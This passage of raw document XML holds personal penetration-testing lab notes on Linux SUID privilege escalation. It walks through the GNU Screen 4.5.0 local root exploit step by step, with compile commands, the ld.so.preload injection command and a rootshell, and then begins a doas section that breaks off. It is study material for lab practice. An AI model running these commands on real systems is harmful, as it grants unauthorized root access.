      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xm5cmte5w87k" w:id="298"/>
      <w:bookmarkEnd w:id="298"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID attacks not in GTFOBins or need more context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-A .143</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E2">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So this was a terribly hard attack vector. And it was long, so I won't go into too much depth. I don't think this was even the intended priv esc. I think it was a kernel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:strike w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. But, the way I and many others did it was with GNU Screen 4.5.0 exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E3">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I saw screen when I looked at SUID bit binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60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/usr/bin/screen-4.5.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E5">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And I could tell from discord that this was one way to Priv Esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E6">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So, I searched it up and found this from exploit DB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId722">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/41154</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E8">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I tried downloading it and running it, but it didn't work. So, I manually ran the commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021E9">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And I did all the compiling locally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EA">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First I ran /tmp/libhax.c, but then I got an error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>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092200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="324" name="image306.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image306.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId723"/>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21EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I asked chatGPT and it said to add this line. You could have also searched up "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what C headers are needed for chmod</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and it would say  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;sys/stat.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="60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#include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>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gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F0">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And then I tried creating </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootshell.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but I got another error, which I fixed via chatGPT by adding this line. You could have also searched up "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what C headers are needed for setuid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and it would say</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;unistd.h&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60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#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="219" name="image214.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image214.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId724"/>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1F3">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And then it tells us to run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o /tmp/rootshell /tmp/rootshell.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but we actually have different gcc version than the target (which we can tell from linPEAS appartently. Like ours is gcc and theres is gcc-9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F4">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So, we actually can fix this by adding the "-static" flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60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gcc -static -o /tmp/rootshell /tmp/rootshell.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F6">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And now we can move </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rootshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> libhax.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>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chmod +x rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F8">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And then run this according to exploit (run these on the victim, not kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">umask 000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FC">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This basically tells screen-4.5.0 to load our libhax.so so that it runs the malicious code to allow us to run shell as root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FD">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And then go back to /tmp/rootshell, and run the rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>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./rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FF">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and you should have root shell now!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002200">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how the attack works btw:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002201">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No: rootshell does not depend on libhax.so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002202">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They are two independent binaries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002203">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit chain is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002204">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Build libhax.so (the payload library).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002205">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trick screen into loading it as root (LD_PRELOAD=/tmp/libhax.so screen ...).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libhax.so executes malicious code as root — typically it drops a setuid root binary like /tmp/rootshell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002207">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="605"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you just run /tmp/rootshell and you’re root, no libhax.so involved anymore.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002208">
      <w:pPr>
        <w:ind w:left="108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2209">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7r1dogch7y7y" w:id="299"/>
      <w:bookmarkEnd w:id="299"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">doas (/usr/local/bin/doas)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Relia Challenge Lab on machine 172.16.xxx.20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run linpeas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See the Doas with SUID bit set (meaning we can run doas binary as root since root owns the binary)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002210">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
